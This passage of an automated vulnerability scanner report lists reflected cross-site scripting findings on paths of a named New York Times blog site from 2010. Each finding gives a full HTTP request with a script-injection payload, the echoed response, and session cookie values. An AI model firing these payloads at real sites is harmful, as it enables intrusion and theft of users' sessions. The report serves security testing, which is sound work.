The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51ef1"><script>alert(1)</script>84210864ce9 was submitted in the REST URL parameter 2. This input was echoed as 51ef1\"><script>alert(1)</script>84210864ce9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-stone51ef1"><script>alert(1)</script>84210864ce9/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:32:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:32:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-stone51ef1\"><script>alert(1)</script>84210864ce9&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.232. http://opinionator.blogs.nytimes.com/category/the-stone/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/the-stone/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10b0d"><script>alert(1)</script>b5580bee2 was submitted in the REST URL parameter 3. This input was echoed as 10b0d\"><script>alert(1)</script>b5580bee2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-stone/feed10b0d"><script>alert(1)</script>b5580bee2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:27:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:27:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-stone/feed10b0d\"><script>alert(1)</script>b5580bee2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.233. http://opinionator.blogs.nytimes.com/category/the-stone/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/the-stone/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ccb5"><script>alert(1)</script>1a1a652616f was submitted in the REST URL parameter 3. This input was echoed as 1ccb5\"><script>alert(1)</script>1a1a652616f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-stone/page1ccb5"><script>alert(1)</script>1a1a652616f/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:31:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:31:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-stone/page1ccb5\"><script>alert(1)</script>1a1a652616f/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.234. http://opinionator.blogs.nytimes.com/category/the-thread [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/the-thread

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae4b"><script>alert(1)</script>c23f40df9ac was submitted in the REST URL parameter 2. This input was echoed as 7ae4b\"><script>alert(1)</script>c23f40df9ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-thread7ae4b"><script>alert(1)</script>c23f40df9ac HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:32:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:32:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-thread7ae4b\"><script>alert(1)</script>c23f40df9ac&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.235. http://opinionator.blogs.nytimes.com/category/the-thread/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/the-thread/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9594"><script>alert(1)</script>20b13b2f18a was submitted in the REST URL parameter 2. This input was echoed as e9594\"><script>alert(1)</script>20b13b2f18a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-threade9594"><script>alert(1)</script>20b13b2f18a/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:32:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:32:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-threade9594\"><script>alert(1)</script>20b13b2f18a&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.236. http://opinionator.blogs.nytimes.com/category/the-thread/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/the-thread/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 653ab"><script>alert(1)</script>85b47746a21 was submitted in the REST URL parameter 3. This input was echoed as 653ab\"><script>alert(1)</script>85b47746a21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-thread/feed653ab"><script>alert(1)</script>85b47746a21/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:28:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:28:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-thread/feed653ab\"><script>alert(1)</script>85b47746a21&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.237. http://opinionator.blogs.nytimes.com/category/the-thread/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/the-thread/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69d3f"><script>alert(1)</script>9c9a593d0ef was submitted in the REST URL parameter 3. This input was echoed as 69d3f\"><script>alert(1)</script>9c9a593d0ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-thread/page69d3f"><script>alert(1)</script>9c9a593d0ef/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:33:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:33:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-thread/page69d3f\"><script>alert(1)</script>9c9a593d0ef/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.238. http://opinionator.blogs.nytimes.com/category/timothy-egan [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/timothy-egan

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ecde"><script>alert(1)</script>ad46de21bb2 was submitted in the REST URL parameter 2. This input was echoed as 6ecde\"><script>alert(1)</script>ad46de21bb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/timothy-egan6ecde"><script>alert(1)</script>ad46de21bb2 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:18:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:18:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/timothy-egan6ecde\"><script>alert(1)</script>ad46de21bb2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.239. http://opinionator.blogs.nytimes.com/category/timothy-egan/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/timothy-egan/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceef4"><script>alert(1)</script>7dd57e8e4f1 was submitted in the REST URL parameter 2. This input was echoed as ceef4\"><script>alert(1)</script>7dd57e8e4f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/timothy-eganceef4"><script>alert(1)</script>7dd57e8e4f1/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:17:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:17:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/timothy-eganceef4\"><script>alert(1)</script>7dd57e8e4f1&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.240. http://opinionator.blogs.nytimes.com/category/timothy-egan/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/timothy-egan/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e964d"><script>alert(1)</script>f79359d6b0 was submitted in the REST URL parameter 3. This input was echoed as e964d\"><script>alert(1)</script>f79359d6b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/timothy-egan/feede964d"><script>alert(1)</script>f79359d6b0/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:14:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:14:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
